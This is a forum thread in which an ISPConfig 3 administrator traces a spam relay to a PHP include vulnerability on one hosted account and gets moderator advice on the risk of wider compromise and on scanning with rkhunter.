Go Back   HowtoForge Forums | HowtoForge - Linux Howtos and Tutorials > Linux Forums > Server Operation

Do you like HowtoForge? Please consider supporting us by becoming a subscriber.

Old 19th December 2010, 08:42

Default ISPConfig 3 – spam attack

Hello,

I recently set up an ISPConfig 3 box (been running ISPConfig 2 successfully for years). The new box was set up on Ubuntu 10.04.1 LTS using the perfect server instructions (to the best of my abilities).

However, the new machine is now being used as a spam relay. The attacker has guessed a local username (webXX@example.com) and is using that successfully as a sender address.

The server needs to accept incoming mail for the customer domains, but all real clients should authenticate themselves via SMTP auth.

What would be the usual suspects in the Postfix configuration I should be looking at?

Thanks!
Sponsored Links
Old 19th December 2010, 10:29

Default Found it

OK, apparently the culprit is a vulnerable PHP application on one of the accounts, so Postfix is not at fault.

So, a related question: if a SuPHP account was compromised via a script vulnerability, what is the risk that the attacker has gained wider access (beyond just the infected account)?
Old 19th December 2010, 11:25
Super Moderator

Thanked 5,496 Times in 4,326 Posts

It is unlikely that the attacker gained wider access when you install Linux updates regulrily. Also most of these attackes were done by automatic script which are only made to send spam, so they do not even try to attacke the system behind the webspace.

Nevertehless, you should scan the system with rkhunter.
Old 19th December 2010, 11:58

Default Intrusion method

Upon further investigation, it seems that the injection method is the one described here:

http://www.ivankristianto.com/hackin...anto-com/1503/

I have modified the offending script with the include vulnerability, and I am currently investigating how to prevent similar injections in the future (beyond reviewing all customer PHP code).